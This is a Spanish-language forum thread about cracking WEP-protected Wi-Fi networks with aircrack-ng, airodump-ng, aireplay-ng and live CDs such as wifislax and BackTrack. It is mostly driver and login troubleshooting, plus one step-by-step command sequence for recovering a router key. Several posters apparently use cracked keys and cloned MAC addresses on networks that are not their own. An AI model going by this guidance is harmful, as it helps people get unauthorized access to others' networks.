Read 1614 packets (got 80 ARP requests), sent 41978 packets...(310 pps)

Pero aunque recibo los ARP el data sigue incrementando lentamente :(

LooKoo
27-06-2007, 06:20
Al final lo consegui con unos 250.000 Ivs :0=

Salu2

tivigualdo
08-07-2007, 21:38
aver me e leido el manual desde el principio y mi gran duda es , este manual sirve para descifrar el codigo de proteccion de cualquier router con seguridad wep ? o el manual es para un tipo de routers especificados ?

clarinetista
08-07-2007, 23:36
Es independiente del dispositivo

tivigualdo
08-07-2007, 23:45
Es independiente del dispositivo

osea que quieres decir que este manual sirve para todas las encriptaciones wep ? o hay tipos ?

clarinetista
09-07-2007, 00:23
Llevas un poco de lío ahí, échale un ojo a esto:

http://www.gammainternet.com/tecnologia/wireless/glosario.html

http://guia.mercadolibre.com.ve/wifi-wireless-que-es-redes-inalambricas-tutorial-8825-VGP

j8k6f4v9j
09-07-2007, 01:51
Al final lo consegui con unos 250.000 Ivs :0= Entonces era de "64 bits".


aver me e leido el manual desde el principio y mi gran duda es , este manual sirve para descifrar el codigo de proteccion de cualquier router con seguridad wep ? o el manual es para un tipo de routers especificados ?No se trata del tipo de cifrado WEP. No todos los routers son en teoría vulnerables a este ataque, pero con las mismas herramientas se pueden hacer otros tipos de ataques (lee la documentación de aircrack-ng para más información).

El tema está en que los routers van implementando una serie de contramedidas a estos ataques conforme van saliendo al mercado. Estos nuevos firmwares pueden hacer que te cueste un poco más o incluso que no lo consigas con decenas de millones de vectores de inicialización diferentes capturados. Esto se debe principalmente a que se van obteniendo vectores pero no los suficientes para una profundidad determinada de bits, con lo que falla la averiguación de la clave. La mayoría de puntos de acceso son vulnerables directamente al ataque de reinyección de ARPs, que es el primero que se suele intentar y el más famoso. Aunque como digo, hay otros ataques diferentes.

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

tivigualdo
10-07-2007, 12:37
aver que me aclare para realizar este manual necesitas operar con linux ?

djremitz
16-10-2007, 22:15
Salu2[/QUOTE]
no comprendi mucho lo que mencionan , pero voy a intentar aprender ...
no se como no encontre este foro antes.
En mi caso que uso windows (no tengo linux pork no se instalarlo)se usa el mismo programa? de ser necesario me consigo el linux segun se puedo tener dos S.O.

LeRaS
16-10-2007, 23:54
Aunque si que hay programas que hacen lo mismo o similar en windows, este manual está hecho usando troppix, un licd que no necesita instalacion, arrancas el ordenador y te carga el s.o. del cd, cuando acabes inicias sin el cd, i otra vez a usar el windows.

Si que puedes tener dos s.o., yo lo tengo asi, de hecho en el foro hay un manual que hizo j8 si no recuerdo mal donde te explica como instalar ubuntu en un ordenador con windows ya instalado (creo).

j8k6f4v9j
17-10-2007, 07:57
Así es, el manual de instalación de ubuntu también está en la ezine, por si no lo encuentra en el foro.


En mi caso que uso windows (no tengo linux pork no se instalarlo)se usa el mismo programa?Se usa el mismo programa, pero con muchas limitaciones (debidas a las limitaciones de los controladores de las mismas tarjetas para güindous) y también otros (con las mismas limitaciones)
de ser necesario me consigo el linux segun se puedo tener dos S.O.
Sí se puede, perfectamente, busca información sobre "arranque dual". Ten en cuenta que si sigues el manual el instalador te prepara el arranque automáticamente.

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

djremitz
19-10-2007, 06:01
Pues ya trate en varios lugares de bajar el Tropix y nada.. nomas me falta en UseNext.. voy a checar.
Mientras voy a seguir leyendo mas.. tks

j8k6f4v9j
19-10-2007, 14:23
Es que troppix dejó de ser mantenido hace años. Mejor usa una distribución actual como wifislax y lee la documentación por tu cuenta. Muchos comandos han cambiado, y hay nuevos ataques que no he documentado aquí.

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

ellargo24
01-11-2007, 19:50
hola,como comprobaras soy nuevo en esto,entonces tengo una tarjeta wireless asus 802,11 b/g y no se que tipo de chipset tengo que poner si atheros no se si me podria ayudar gracias de antemano.

j8k6f4v9j
03-11-2007, 11:39
El chipset no lo pones, sino que es el dispositivo electrónico que viene integrado en la tarjeta desde su fabricación. Has de averiguar si el chipset de tu tarjeta es compatible con Linux. Prueba a buscarla con `dmesg`, `lspci`, lsusb` y también en /var/log/messages.

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

ellargo24
03-11-2007, 12:33
gracias j8k6f4v9j,pero se me olvido un punto principal por mi parte,mi S.O. es windows no linux,gracias y perdona por el fallo.;)

j8k6f4v9j
03-11-2007, 13:51
Con güindous poco vas a poder hacer. Hay software por ahí, pero en mi opinión es perder el tiempo.

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

Warpath
16-11-2007, 13:36
Wenas yo tb soy nuevo y me pasa lo mismo ke a ellargo24 mas o menos, yo utilizo la Conceptronic Wireless USB Adaptador 54mbps y el airdump no me la reconoce. y aora estoy probando con el portatil y me ocurre lo mismo, en este la tarjeta es intel pro/wireless 2200bg y tampoco me la reconoce con este programa. Lo estoy realizando en windows ya ke de linux tengo poco conocimiento e investigado en muxos sitios y en este e visto ke dais mejor las explicaciones. Yo creo ke una vez consiga reconocer las tarjetas wireless sabre seguir yo solo. Gracias por vuestra paciencia y enorabuena por la web ke es genial. Si consigo realizar esto me gustaria profundizar mas en temas de hackeo y crackeo y asta iniciame en Linux segun el tiempo ke vaya teniendo y se ke con vosotros no me sera dificil aprender.

guly09
16-11-2007, 19:24
:O m

cormoran
31-12-2007, 12:02
Podriais decir que programilla hay que funcionen con windows,para probar,es que muchos no tenemos ni idea de linux,Gracias y feliz año.

Cypress
31-12-2007, 15:26
Concuerdo con j8 ;) ve empezando a bajarte un liveCD, hay distribuciones de linux especializadas para robar wifi y otras fechorias ;) probate backtrack,

aircrack:
http://www.google.com/search?client=opera&rls=en&q=aircrack+para+windows&sourceid=opera&ie=utf-8&oe=utf-8

airodump
http://www.google.com/search?hl=es&client=opera&rls=en&hs=yq0&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=airodump+para+windows&spell=1

aireplay:
http://www.google.com/search?hl=es&client=opera&rls=en&hs=2q0&q=aireplay+para+windows&btnG=Buscar&lr=


Saludos :)

manuel santo
09-01-2008, 01:14
Hola , me llamo Manuel santos y es la primera ves que entro en este foro , es muy interesante todo lo que e podido leer y entender , espero me disculpéis por si me precipito en mis actuaciones , no acostumbro a participar en foros y soy un poco torpon

Conforme al tema en cuestión yo e utilizado el wifisla 3.0 y una antena alfa networ chiset realtek

Luego una vez reinicio habiendo introducido wifisla y se abre

e puesto en loging- root
en passwoor-toor
sale wifisla -xconf
sale wifisla -startx y ya sabemos que esto es para configurar la tarjeta grafica de linux
se abre el entorno de wifisla y su música
wfisla -iwconfig wlan0
wifisla -airmon-ng start wlan0 6
wifisla - iwconfig wlano
wifisla - airodump-ng -w xxxx wlan0 ( esto es para buscar canal)
hay un pequeño toque de dos teclas y seguimos
wifisla- airodump-ng -w xxxx -c11 wlan0
hay un pequeño toque de dos teclas de nuevo
wifisla - ls
cierro la ventana ( se me olvidaba , una ves hubiera captura do un solo paquete
y teniendo guardado en la unidad c del pc airelab y el comando universal

cd..&&cd..&&cd AIRELAB&&EWF 00:00:00:00:00:00 WLAN_00 xxxx-02.cap (clave universal) poniendo la mac del routers atacado y su nombre wlan_00 o xx y el ivs capturado -02.cap o -03.cap etc
Me voy a Home en wifisla y copio clave -02.cap
pincho carpeta mnt luego en sda1 que contiene el airela , vuelvo a pinchar y pego en el centro pantalla con post file , cierro todas las ventanas .
entro en la unidad c copio comando universal con su mac y los punto cap correspondiente y pincho en airela , pincho en acceso directo a consola y pego comando universal y obtengo la clave en tan solo 3, 4 minutos siempre que tenga capturado un mínimo de 1 o mas paquetes aveces ,espero que os sirva de algo .

Mi pregunta es que en alguno routers de telefónica (wlan_7B ) aun teniendo la clave y colocándola y diciendo me el ordenador obteniendo direccion de red y luego me pone conectado , es que al querer entrar en Internet no me deja ( y creo que no me designa ip por alguna configuracion interna del routers , e intentado cambiar mi ip y la mac de la antena y aun asin no me deja después de tener la clave , ¿ podéis ayudarme

salsiria
24-04-2008, 16:15
Hola:
Vengo tratando de usar el wifislax o el backtrack desde hace mucho tiempo y no lo he logrado, no se si es que hago algo mal. Creo que una de las razones es que estoy nulo en linux; pero bueno, te cuento lo siguiente: compré una tarjeta con chipset rtl8185 y nunca la tomó, después compré una d-link dwa-110 que tiene los drivers dr71wu y creo que chipset rt73, utilizo los lanzadores de wifislax, pero nisiquiera aparece el rausb0 cuando doy iwconfig. Encontré en internet que existían unos drivers para esta tarjeta y especifican los pasos a seguir para instalarla pero cuando llego a un comando make puf! saca error y ya no puedo seguir, no se si es porque uso un live cd, o qué sucede. Te pido el favor que si me puedes orientar, me ayudes de alguna manera.

Gracias.

foxwar
24-04-2008, 16:53
Que error te da al usar el make? necesitamos mas información del error que te da.
Saludos

j8k6f4v9j
24-04-2008, 16:56
He intentado cambiar mi ip y la mac de la antena y aun asin no me deja después de tener la clave , ¿ podéis ayudarme

Siento no haber contestado antes, he estado ausente y hasta que no han vuelto a escribir en el hilo no lo he visto.

Una vez obtenido la clave, _siempre_ se ha de comprobar descifrando un paquete de una nueva captura actual. Así se comprueban dos cosas: que el programa no muestra una clave producto de un falso positivo y que, no siendo un falso positivo, que no se haya cambiado legítimamente la clave de cifrado.

Para ello recomiendo usar airdecap ( del aircrack-ng)

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

j8k6f4v9j
24-04-2008, 16:58
Hola:
Vengo tratando de usar el wifislax o el backtrack desde hace mucho tiempo y no lo he logrado, no se si es que hago algo mal. Creo que una de las razones es que estoy nulo en linux; pero bueno, te cuento lo siguiente: compré una tarjeta con chipset rtl8185 y nunca la tomó, después compré una d-link dwa-110 que tiene los drivers dr71wu y creo que chipset rt73, utilizo los lanzadores de wifislax, pero nisiquiera aparece el rausb0 cuando doy iwconfig. Encontré en internet que existían unos drivers para esta tarjeta y especifican los pasos a seguir para instalarla pero cuando llego a un comando make puf! saca error y ya no puedo seguir, no se si es porque uso un live cd, o qué sucede. Te pido el favor que si me puedes orientar, me ayudes de alguna manera.

Gracias.

Hola salsiria,

Como te dice foxwar, has de pegar el error exacto que te da el make para que te podamos ayudar. Lo más frecuente es que se trate de un error al buscar las cabeceras del kernel (kernel-headers) necesarias para compilar el software.

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

salsiria
24-04-2008, 17:44
el error:
make:*** /lib/modules/2.6.21.5/build:no such file or directory stop
rt73.ko failed to build
make:*** [module] error 1

Gracias.

blasin
27-06-2008, 19:53
E estado leeyendo to esto y no me queda claro una cosa, yo tengo windows vista. Puedo hacer todo el proceso con este SO?

j8k6f4v9j
27-06-2008, 22:52
No, para Windows hay otras herramientas, pero no son tan potentes. Todo lo explicado es bajo GNU/linux. Hay liveCDs que ya contienen tanto el software como los controladores para las tarjetas.

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

j8k6f4v9j
27-06-2008, 22:54
el error:
make:*** /lib/modules/2.6.21.5/build:no such file or directory stop
rt73.ko failed to build
make:*** [module] error 1

Gracias.

No sé por qué no había visto este mensaje. :confused:

Salsiria, el problema es que no tienes las cabeceras del kernel para la versión exacta del mismo. ¿Has hecho esto?:


apt-get install linux-headers-`uname -r`

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

blasin
28-06-2008, 13:13
Alguien me podria orientar un poco para hacer todo esto con vista???

j8k6f4v9j
28-06-2008, 13:47
blasin, el tema de los controladores en Vista es escabroso. Si quieres puedes ir buscando información sobre commview y netstumbler, que a mi modo de ver son las únicas herramientas reales (hay muchos fantasmas) competentes que quizá corran sobre Vista. igo quizá porque sé que en XP sí van, pero no sé si se han adaptado a los cambios que Vista introduce.

Pero sinceramente, y espero que no lo confundas con un fanatismo infundado por mi parte, estas herramientas son para la seguridad en redes inalámbricas bastante cojas. Con netstumbler no esperes soporte para todas las tarjetas, realmente soportadas hay verdaderamente pocas, lo digo con conocimiento de causa. Y commview, pues bueno, no tiene de su lado ni al sistema operativo ni a los controladores de las tarjetas, por lo que temas como la reinyección (esencial para cualquier clave WEP y mucho más que esencial para algunas) resultan sangrantes.

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

blasin
02-07-2008, 01:25
Sabeis donde puedo pillar un manual Aircrack-ng en castellano?

clarinetista
02-07-2008, 01:30
http://www.aircrack-ng.org/doku.php?id=aircrack-ng.es

avwnash
27-12-2008, 02:22
hola.tengo un problema de conexion a una red de internet con cifrado WEP,haber : conecto a la red, hago ping a la puerta de enlace y tengo respuesta (continua),pero cuando hago ping a www.google.com no hay respuesta,soy de Perú y coloqué las DNS: 200.48.225.130 y.146 ,tengo buena señal incluso recibo muchos datos (pues la mac esta clonada)...
hummm...el rango de ip IP es : 20.110.10.X por sicaso..la puerta de enlace es 20.110.10.5...he probado con ip altos..y tmb bajos...1º crei q era problema del DNS, pero ya he probado con varios DNS's y nada,humm 2º crei q era por filtrado de IP pero tmb me conecto con IP's validos(leidos con wifislax) y nada...no navego,no entiendo q puede ser,puede que exista algun tipo de seguridad especial?...porsiacaso la contraseña es correcta.gracias de antemano por su respuesta.

j8k6f4v9j
27-12-2008, 04:21
avwnash, no repitas posts. Lee las normas del foro.

Si has configurado correctamente tu sistema para que use esa puerta de enlace, y tienes conectividad con ella, lo más lógico sería pensar que no está enrrutando. O a nadie, o a tí debido a algún sistema de autenticación (macs o algo).

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

Giggio
26-02-2009, 22:30
Hola, muy bueno todo, pero hace un mes que me estoy cabeceando ya que cuando comienzo con airmon-ng no logro hacer que la red que me interesa pueda descargar datos, es decir mejor #data=0, entonces cuando llego a la inyección me aparece 0APR por que sucede eso y como se soluciona, con otras redes ningún problema, es es si en BT3 gracias

j8k6f4v9j
27-02-2009, 01:48
Seguramente se deba a que no se está produciendo tráfico. Probablemente no detectes ningún cliente conectado.

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

Difonia
20-09-2009, 05:02
Me ejecuta perfecto el cd... pero me pide un login y contraseña :s q pongo?

j8k6f4v9j
20-09-2009, 12:53
username: root password: toor


Salu2

Difonia
20-09-2009, 21:49
No me sale igual me sale login incorret mira...
http://img148.imageshack.us/img148/6898/dsc03034n.jpg (http://img148.imageshack.us/i/dsc03034n.jpg/)

otra cosa rara es q al momento de poner el pasword no lo puedo poner al costado si no que tengo que apretar enter para recien poder teclear...

clarinetista
20-09-2009, 22:12
El login te sale al teclear pero el pass no,teclealo aunque no lo veas y dale Intro despues

Difonia
20-09-2009, 23:45
http://img33.imageshack.us/img33/1829/dsc03035a.jpg (http://img33.imageshack.us/i/dsc03035a.jpg/)

Bueno despues de eso que hago :s perdonen por tantas molestias...
Pero esto me sale cuando pongo los 2 como root, y si pongo otro aparte me sale login incorret
Por si acaso mi pc es una tecra s1 Toshiba

clarinetista
21-09-2009, 13:12
Startx :)

Difonia
22-09-2009, 23:08
Me salio error :s
http://img193.imageshack.us/img193/8374/dsc03038g.jpg (http://img193.imageshack.us/i/dsc03038g.jpg/)

Por si acaso me voy a volver a bajar de nuevo el .iso haber si este tiene alguna error

j8k6f4v9j
22-09-2009, 23:44
La imagen ISO no parece estar mal

http://www.google.es/search?client=opera&rls=es-ES&q=%22no+devices+detected%22&sourceid=opera&ie=utf-8&oe=utf-8


Salu2

3666
23-09-2009, 03:59
como hago si mi targeta no es compatible con airodump

j8k6f4v9j
23-09-2009, 15:23
Se necesita una tarjeta que soporte el modo monitor para poder capturar paquetes. Y para acelerar el proceso de recopilación de paquetes, la tarjeta debe soportar además la reinyección. La mejor forma de saberlo es probándola.


Salu2

Difonia
27-09-2009, 19:27
Ya pude ingresar... pero ahora donde pongo los codigos?
http://img97.imageshack.us/img97/4813/dsc03046.jpg (http://img97.imageshack.us/i/dsc03046.jpg/) http://img97.imageshack.us/img97/dsc03046.jpg/1/w480.png (http://g.imageshack.us/img97/dsc03046.jpg/1/)

http://img97.imageshack.us/img97/6092/dsc03047.jpg (http://img97.imageshack.us/i/dsc03047.jpg/) http://img97.imageshack.us/img97/dsc03047.jpg/1/w640.png (http://g.imageshack.us/img97/dsc03047.jpg/1/)

j8k6f4v9j
28-09-2009, 16:13
Con el comando `iwconfig` (como root) a secas obtendrás un listado con las interfaces del sistema, ahí puedes distinguir claramente cuáles soportan las wireless extensions.

Luego, sustituye ra0 por el nombre de tu interfaz inalámbrica en el sistema. Es más fácil abrir una terminal dentro de la sesión gráfica que estar cambiando a la terminal F1 (que sospecho que es lo que estás haciendo). Debes tener instalada alguna de éstas: xterm, eterm, konsole, gnome-terminal, ... Cualquiera de ellas te vale.


Salu2

Difonia
29-11-2009, 00:59
Tengo una duda veras io eh usado el WifiSlax y e sigo los mismo pasos que dice el tuyo bueno este es el post : http://foro.hackhispano.com/showthread.php?t=33651
Veras y ya me an funcionado todo mi laptop esta buscando los paquetes y al momento de lanzar el aircrack me sale asi lo cual supongo que esta perfecto http://www.grape-info.com/doc/linux/config/images/aircrack01.png
y bueno mi pregunta es como cuantas horas se tiene q esperar?

j8k6f4v9j
30-11-2009, 12:51
Depende de la fortaleza de la clave y de otros factores (sobre todo de protecciones del AP).

Se puede obtener a partir de unos 250000 IVs y en casos excepcionales puedes llegar a los 14 millones de IVs y no sacarla.


Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

Difonia
30-11-2009, 16:06
14 millones y aun asi no sacarla O_O.... wow bueno la estuve dejando de amanecida la laptop y pues parece que encontro la segunda letra xD
1/1 ************************ k
algo asi decia, eso es un avanze?

boma69
03-01-2010, 20:47
hola nens. tengo un wireless usb netgear wg111v3.
sabeis como puedo crackear wep con el.
graciasssss

fikus
11-03-2010, 23:46
busca el driver de tu tarjeta y sigue los pasos de la primera pagina de este post pero con tu driver

Fruit
12-03-2010, 00:43
http://foro.hackhispano.com/showpost.php?p=178158&postcount=4

j8k6f4v9j
13-03-2010, 00:59
aaaiiishhh, si es que no leemos xD


Salu2

boma69
13-06-2010, 00:35
holaaaaaaaaaaaaa hay alguien ahi.........
necesito ayuda para crackear weps con la netgear usb

j8k6f4v9j
13-06-2010, 00:55
busca el driver de tu tarjeta y sigue los pasos de la primera pagina de este post pero con tu driver

pues eso


Salu2

Pollonverven
24-06-2010, 00:32
Es la primera vez que entro en un foro.Voy a formular una duda a ver si alguien puede ayudarme:
Utilizo el backtrack 3 y a menudo me ocurre lo siguiente: Key found (ED:23:46:7F:E2) como coño utilizo este grupo de 5 cifras en hexadecimal.

Fruit
24-06-2010, 00:35
¿Tú qué crees?

j8k6f4v9j
24-06-2010, 02:28
Eso ya es hexadecimal.


Salu2

Pollonverven
24-06-2010, 10:55
Ya se que es hexadecimal.Lo que queria decir es que lo traduzco a ASCII y no me accepta la KEY

Fruit
24-06-2010, 11:26
Es que no tienes que traducirla a ASCII para usarla.

Pollonverven
25-06-2010, 10:56
Es que no tienes que traducirla a ASCII para usarla.

gracias por haber respondido.Si no la traduzco a ASCII como la introduzco cuando me pide la clave y por que solo es de 5 caracteres y no de 13.

Fruit
25-06-2010, 13:10
Pues la introduces tal y como la ves, y es de sólo 5 caracteres porque sí.

j8k6f4v9j
26-06-2010, 09:41
Hay dos longitudes de claves en protecciones de tipo WEP. Y ésta es la más pequeña; y por tanto débil.


Salu2

Pollonverven
28-06-2010, 17:50
Hola ota vez. no me la admite tal y como me aparece:
Por ejemplo: ED:23:46:7F:E2
Me dice error clave erronea.
Saludos

Fruit
28-06-2010, 17:55
ED23467FE2, sin :, of course.

Pollonverven
28-06-2010, 22:23
Perfecto.Gracias por la ayuda.
Saludos.

Pollonverven
13-07-2010, 10:19
Ya estoy aqui otra vez con una duda:
Por que con la clave correcta,y provado desde diferentes ordenadores, me dice:
CONECTADO, pero red no identificada y por lo tanto "sin acceso a internet".
Saludos.

j8k6f4v9j
14-07-2010, 01:17
¿seguro 100% que la clave es correcta? La única forma de que yo confíe en que la clave es correcta es capturando tráfico nuevo y descifrándolo con esa clave (airodump + airdecap, por ejemplo)

Si estás totalmente seguro de que es correcta, el problema probablemente esté en la configuración de red. Si la configuras automáticamente, quizá esté DHCP deshabilitado. Si lo haces manualmente, deberás analizar el tráfico capturado y descifrado para determinar los parámetros correctos de configuración de la red.

Salu2

Pollonverven
22-07-2010, 20:41
Puede ser que te diga Key found, y la clave no sea la correcta?

j8k6f4v9j
22-07-2010, 23:54
Sí. Eso es un falso positivo. También es posible que hayan cambiado la clave posteriormente. Por eso, la única forma de estar seguros es capturar tráfico nuevo y descifrarlo (por ejemplo con airdecap-ng)


Salu2

biyonder
25-07-2010, 10:44
Buenas a todos. Estuve hace unos días probando la nueva distribución de BackTrack para probar a crackear mi red Wireless. El problema es que cuando llego al paso de inyectar paquetes ARP (aireplay -3) no me inyecta ninguno y se queda siempre en 'got 0 ARP packets'. Ya he probado con varias tarjetas inalámbricas y no sé qué puede fallar. Gracias, un saludo.

j8k6f4v9j
25-07-2010, 11:48
Los mensajes ARP sirven para saber qué dirección MAC tiene una dirección IP dada. Por tanto, normalmente sólo se obtienen cuando hay algún cliente legítimo conectado a la red. Si no hay cliente, no hay ARP.

Si estás seguro de que ha habido clientes conectados durante el tiempo que ha durado la captura de tráfico, es posible que haya algún problema que te impida a capturar ARPs. En ese caso, yo probaría con distintos drivers para la tarjeta inalámbrica o, quizás como último recurso, con otra tarjeta.


Salu2

boma69
01-10-2010, 20:39
hola , me podeis pasar un buen manual de backtrak 4.
muchas graciassss

boma69
01-10-2010, 20:41
sirve la version 3?

Fruit
01-10-2010, 21:47
sirve la version 3?

¿Por qué usar una versión desactualizada?

NickBlack
03-01-2011, 17:59
Genial, por cierto no encuentro un manual para wpa.
Alguna opcion que tenga para poder crackear tales redes?


Saludos :D

clarinetista
03-01-2011, 18:31
http://www.google.es/#hl=es&expIds=17259,24472,27147&xhr=t&q=wpa+crack&cp=5&pf=p&sclient=psy&safe=off&aq=0&aqi=&aql=&oq=wpa+cr&gs_rfai=&pbx=1&fp=6b37f9f6e7a3c987

Carei
02-07-2015, 23:01
Hola compañeros me gustaria saber si alguien sabe como se configura este router para añadirle una cuenta dyndns? Salu2